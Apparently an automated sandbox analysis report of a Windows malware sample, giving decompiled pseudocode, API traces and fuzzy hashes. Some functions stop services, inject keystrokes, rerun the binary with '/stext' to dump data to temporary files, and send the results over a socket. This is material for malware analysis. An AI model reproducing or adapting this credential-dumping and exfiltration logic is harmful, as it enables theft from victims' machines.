
Strings

!]A, xrefs: 004165F5, 0041665A

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID: !]A
API String ID: 493672254-3355486170
Opcode ID: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
Instruction ID: 232e6080decb0fee5e9ead3af30a3f9a58c51749ff75a055db7eec232c54b811
Opcode Fuzzy Hash: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
Instruction Fuzzy Hash: 59016D311443253AD6114F3C9C4EEBF3B6CDB417B2F01032BF925922D2DA68CE4295AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041650F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041650F(char _a4) {
				struct _SERVICE_STATUS _v32;
				void* _t6;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t1 =  &_a4; // 0x415f36
				_t20 = _t6;
				_t19 = OpenServiceW(_t20, E00401EEB(_t1), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EF0();
				return _t16;
			}

0x0041651a
0x0041651e
0x00416526
0x00416529
0x00416538
0x0041653c
0x0041655d
0x00416560
0x00416563
0x0041653e
0x0041653f
0x0041653f
0x00416568
0x00416575

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415F36,00000000), ref: 0041651E
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415F36,00000000), ref: 00416532
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 0041653F
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00415F36,00000000), ref: 0041654E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416560
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416563

Strings

6_A, xrefs: 00416526, 00416565

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID: 6_A
API String ID: 221034970-3814682797
Opcode ID: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
Instruction ID: da1897a772ed1359c9b05f965c8e3084c4a483461664f911434d7ad5a9b28404
Opcode Fuzzy Hash: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
Instruction Fuzzy Hash: 90F0C2715403187BD221AF65EC49DBF3B6CDB45B92F00002AFE0992196DA38CE4596E9

Uniqueness

Uniqueness Score: -1.00%

Function 004445EF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004445EF(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x46a00c; // 0xee31ea10
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E004401D9(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0042FD1B(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00430BA0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00442680(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00430BA0(_t101);
									goto L36;
								}
								_t62 = E00442680(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00430BA0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E0043F98C(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00450810();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00442680(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E0043F98C(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00450810();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x004445f4
0x004445f5
0x004445f6
0x004445fd
0x00444601
0x00444602
0x00444608
0x0044460e
0x00444614
0x00444617
0x00444617
0x0044461a
0x0044461c
0x0044461c
0x0044461a
0x0044461e
0x00444623
0x0044462a
0x0044462d
0x0044462d
0x00444649
0x0044464f
0x00444654
0x004447e7
0x004447fa
0x0044465a
0x0044465a
0x0044465d
0x00444662
0x00444666
0x004446ba
0x004446ba
0x004446bc
0x004446be
0x004447dc
0x004447dc
0x004447de
0x004447df
0x00000000
0x004447e5
0x004446cf
0x004446d5
0x004446d7
0x00000000
0x00000000
0x004446dd
0x004446ef
0x004446f4
0x004446f8
0x00000000
0x00000000
0x00444705
0x0044473f
0x00444742
0x00444745
0x00444747
0x00444749
0x0044474b
0x00444797
0x00444797
0x00444799
0x00444799
0x0044479b
0x004447d5
0x004447d6
0x00000000
0x004447db
0x004447af
0x004447b4
0x004447b6
0x00000000
0x00000000
0x004447ba
0x004447bb
0x004447bc
0x004447bf
0x004447fb
0x004447fe
0x004447c1
0x004447c1
0x004447c2
0x004447c2
0x004447cf
0x004447d1
0x004447d3
0x00444804
0x00000000
0x00000000
0x00000000
0x00000000
0x004447d3
0x0044474d
0x00444750
0x00444752
0x00444754
0x00444756
0x00444759
0x0044475e
0x00444779
0x0044477b
0x00444785
0x00444787
0x00444788
0x0044478a
0x00000000
0x00000000
0x0044478c
0x00444792
0x00444792
0x00000000
0x00444792
0x00444760
0x00444762
0x00444766
0x0044476b
0x0044476d
0x0044476f
0x00000000
0x00000000
0x00444771
0x00000000
0x00444771
0x00444707
0x0044470c
0x00000000
0x00000000
0x00444712
0x00444714
0x00000000
0x00000000
0x0044472b
0x00444730
0x00444734
0x00000000
0x00000000
0x00000000
0x0044473a
0x0044466d
0x0044466f
0x00444671
0x00444679
0x00444698
0x0044469a
0x004446a4
0x004446a6
0x004446a7
0x004446a9
0x00000000
0x00000000
0x004446af
0x004446b5
0x004446b5
0x00000000
0x004446b5
0x0044467d
0x00444681
0x00444686
0x0044468a
0x00000000
0x00000000
0x00444690
0x00000000
0x00444690

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 00444649
__alloca_probe_16.LIBCMT ref: 00444681
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 004446CF
__alloca_probe_16.LIBCMT ref: 00444766
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004447C9
__freea.LIBCMT ref: 004447D6

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

__freea.LIBCMT ref: 004447DF
__freea.LIBCMT ref: 00444804

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
Instruction ID: 38c3e806ad7a3790cd52a8b2f1174a250ebfd45b4bb0c692cfbb473d4bf5d511
Opcode Fuzzy Hash: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
Instruction Fuzzy Hash: E951E3B2610216AFFB258F60CC41FAB77A9EB85754F15462BFC04D7240EB3CDC5186A8

Uniqueness

Uniqueness Score: -1.00%

Function 00415288, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 004152BC
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152DA
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152F7
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415309
SendInput.USER32(00000001,00000001,0000001C), ref: 00415320
SendInput.USER32(00000001,00000001,0000001C), ref: 0041533D
SendInput.USER32(00000001,00000001,0000001C), ref: 00415359
SendInput.USER32(00000001,?,0000001C,?), ref: 00415376

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
Instruction ID: e5dbb7d03718becac2084a9070c23a21e9d5ec01c3d02bef7d0779bca3f6509f
Opcode Fuzzy Hash: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
Instruction Fuzzy Hash: 96311E72D9025CA9FB109BD1CC46FFFBB78AF58B14F04000AE604AB1C2D6F995858BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00410305, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 374
filesleepCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00410305(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
				char _v5;
				char _v6;
				char _v7;
				char _v12;
				char _v36;
				char _v60;
				char _v84;
				char _v108;
				char _v132;
				char _v156;
				char _v180;
				char _v204;
				char _v228;
				char _v252;
				char _v276;
				char _v300;
				char _v324;
				char _v348;
				char _v372;
				char _v396;
				char _v420;
				char _v444;
				char _v468;
				short _v988;
				void* __ebx;
				void* __edi;
				void* _t173;
				void* _t199;
				void* _t225;
				void* _t226;
				void* _t394;
				void* _t399;
				void* _t402;
				void* _t405;

				_t405 = __eflags;
				_v12 = 0;
				GetModuleFileNameW(0,  &_v988, 0x104);
				_v5 = 0;
				_v6 = 0;
				E004020D5(0,  &_v300);
				E004020D5(0,  &_v276);
				E004020D5(0,  &_v252);
				E0041800F( &_v228, 0x30, E00401F95(E00417093( &_v36)));
				E00401FC7();
				E0041800F( &_v204, 0x30, E00401F95(E00417093( &_v36)));
				E00401FC7();
				E0041800F( &_v180, 0x30, E00401F95(E00417093( &_v36)));
				E00401FC7();
				E00401F95( &_a52);
				_t393 = L" /stext \"";
				_t224 = E0041432B(E00401EEB(E004030A6(0,  &_v396, E00404429(0,  &_v420, E00404405(0,  &_v444,  &_v988, _t405, E0040427F(0,  &_v468, L" /stext \"")), _t405,  &_v228), L" /stext \"", _t405, "\"")));
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401F95( &_a76);
				_t225 = E0041432B(E00401EEB(E004030A6(_t224,  &_v324, E00404429(_t137,  &_v348, E00404405(_t137,  &_v372,  &_v988, _t405, E0040427F(_t137,  &_v60, _t393)), _t405,  &_v204), _t393, _t405, "\"")));
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401F95( &_a100);
				_v7 = E0041432B(E00401EEB(E004030A6(_t225,  &_v84, E00404429(_t225,  &_v108, E00404405(_t225,  &_v132,  &_v988, _t405, E0040427F(_t225,  &_v156, _t393)), _t405,  &_v180), _t393, _t405, "\"")));
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401EF0();
				_t399 =  ==  ? 1 : 0;
				if(_t225 == 0) {
					_t399 = _t399 + 1;
				}
				if(_v7 == 0) {
					_t399 = _t399 + 1;
				}
				_t226 = DeleteFileW;
				_t394 = 0;
				L5:
				L5:
				if(E004179DC(E00401EEB( &_v228),  &_v300) != 0) {
					_v12 = 1;
					DeleteFileW(E00401EEB( &_v228));
				}
				if(E004179DC(E00401EEB( &_v204),  &_v276) != 0) {
					_v5 = 1;
					DeleteFileW(E00401EEB( &_v204));
				}
				if(E004179DC(E00401EEB( &_v180),  &_v252) != 0) {
					_v6 = 1;
					DeleteFileW(E00401EEB( &_v180));
				}
				if(_v12 == 0 || _v5 == 0 || _v6 == 0) {
					goto L14;
				}
				L15:
				_t173 = E00405A6F("0");
				_t418 = _t173;
				if(_t173 == 0) {
					E00402F93(_t226, _t402 - 0x18, E00402F93(_t226,  &_v156, E00402F93(_t226,  &_v132, E00402F93(_t226,  &_v108, E00402F93(_t226,  &_v84, E00402FB7( &_v60,  &_a28, 0x46c238), __eflags,  &_v300), __eflags, 0x46c238), __eflags,  &_v276), __eflags, 0x46c238), __eflags,  &_v252);
					_push(0x6a);
					E00404AA4(_t226, 0x46c650, _t180, __eflags);
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E00401FC7();
				} else {
					_t199 = E00417226(_t226,  &_v324, _t399);
					E00402F1D(_t402 - 0x18, E00402F93(_t226,  &_v156, E00402F93(_t226,  &_v132, E00402F93(_t226,  &_v108, E00402F93(_t226,  &_v84, E00402F93(_t226,  &_v60, E00402F93(_t226,  &_v372, E00402FB7( &_v348,  &_a28, 0x46c238), _t418,  &_v300), _t418, 0x46c238), _t418,  &_v276), _t418, 0x46c238), _t418,  &_v252), _t418, 0x46c238), _t199);
					_push(0x69);
					E00404AA4(_t226, 0x46c650, _t207, _t418);
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E00401FC7();
				}
				E00401FC7();
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401FC7();
				E00401FC7();
				E00401FC7();
				E00401FC7();
				E00401FC7();
				E00401FC7();
				E00401FC7();
				return E00401FC7();
				L14:
				Sleep(0x1f4);
				_t394 = _t394 + 1;
				if(_t394 < 0xa) {
					goto L5;
				}
				goto L15;
			}

0x00410305
0x00410320
0x00410323
0x0041032f
0x00410332
0x00410335
0x00410340
0x0041034b
0x00410368
0x00410371
0x0041038e
0x00410397
0x004103b4
0x004103bd
0x004103c5
0x004103dd
0x00410428
0x00410430
0x0041043b
0x00410446
0x00410451
0x00410459
0x004104ba
0x004104bc
0x004104c7
0x004104d2
0x004104da
0x004104e2
0x0041053a
0x0041053d
0x00410545
0x0041054d
0x00410558
0x00410566
0x0041056b
0x0041056d
0x0041056d
0x00410571
0x00410573
0x00410573
0x00410574
0x0041057a
0x00000000
0x0041057c
0x00410596
0x0041059e
0x004105a8
0x004105a8
0x004105c4
0x004105cc
0x004105d6
0x004105d6
0x004105f2
0x004105fa
0x00410604
0x00410604
0x0041060a
0x00000000
0x00000000
0x0041062d
0x00410635
0x0041063a
0x0041063c
0x0041078d
0x00410793
0x0041079a
0x004107a5
0x004107ad
0x004107b5
0x004107bd
0x00410642
0x0041064a
0x004106ce
0x004106d4
0x004106db
0x004106e6
0x004106ee
0x004106f6
0x004106fe
0x00410706
0x00410711
0x0041071c
0x00410721
0x004107c5
0x004107d0
0x004107db
0x004107e6
0x004107f1
0x004107fc
0x00410807
0x0041080f
0x00410817
0x0041081f
0x00410827
0x0041083a
0x00410618
0x0041061d
0x00410623
0x00410627
0x00000000
0x00000000
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410323

Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA

Part of subcall function 0041432B: CloseHandle.KERNEL32( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
Part of subcall function 0041432B: CloseHandle.KERNEL32(?), ref: 0041434A

DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105A8
DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105D6
DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 00410604
Sleep.KERNEL32(000001F4,0045F464,0045F464,0045F464), ref: 0041061D

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Strings

/stext ", xrefs: 004103DD, 004103E3, 0041046F, 004104FB

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
String ID: /stext "
API String ID: 1351907930-3856184850
Opcode ID: 9ba4e5789f2cd1714cad2277aa3e4156a6b68364b5e6912a30b3d844b7ed40a9
Instruction ID: c6d11188fe555bf6b2f514a85e60615a11b65789dd85123b9d7458d5680bae53
Opcode Fuzzy Hash: 9ba4e5789f2cd1714cad2277aa3e4156a6b68364b5e6912a30b3d844b7ed40a9
Instruction Fuzzy Hash: DDD15C319102595BCB19FB61DC91AEDB375AF54308F4041BFA40AB71E2EF785E89CE48

Uniqueness

Uniqueness Score: -1.00%

Function 105D3AFC, Relevance: 10.9, APIs: 7, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E105D3AFC(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E105D373B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E105D3799( &_v8) != 0 || E105D3741( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E105C77F8();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E105D373B();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E105D3799( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E105C77F8();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_v100 =  *0x46a00c ^ _t192;
						 *0x46a344 =  *0x46a344 | 0xffffffff;
						 *0x46a338 =  *0x46a338 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x46b748 = 0;
						_t78 = E105CA703(__eflags,  &_v360,  &_v356, 0x100, 0x45913c);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E105D07FA(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E105CA703(__eflags,  &_v280, _t184, _v276, 0x45913c);
									__eflags = _t85;
									if(_t85 == 0) {
										E105D1063(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E105D1063();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E105D3AFC(0x45913c, _t172, _t183, __eflags);
							}
						}
						E105D1063(_t183);
						__eflags = _v16 ^ _t192;
						return E105C0B89(_v16 ^ _t192);
					} else {
						_t89 = E105D3741( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E105D376D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E105D1063( *0x46b740);
								 *0x46b740 = 0;
								 *_t194 = 0x46b750;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x46b750 * 0x3c;
									_t167 =  *0x46b7a4;
									_push(_t171);
									 *0x46b748 = 1;
									_v12 = _t150;
									__eflags =  *0x46b796;
									if( *0x46b796 != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x46b7ea;
									if( *0x46b7ea == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x46b7f8;
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E105D03C9(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x46b754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x46b7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E105D3735()) = _v12;
								 *((intOrPtr*)(E105D3729())) = _v16;
								_t96 = E105D372F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x46b740;
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						E105D1063(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x105d3eed
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x105d3eee
						 *0x46b740 = E105D07FA(_t154 - _t169, _t13);
						_t116 = E105D1063(0);
						_t170 =  *0x46b740;
						if( *0x46b740 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x105d3eed
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x105d3eee
							_t119 = E105D2784(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E105DE177(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E105C75D7(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E105C75D7(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E105C75D7(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E105D3735()) = _v8;
										_t128 = E105D3729();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E105DE177(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								_t10 = _t166 + 1; // 0x0
								if(_t141 !=  *_t10) {
									break;
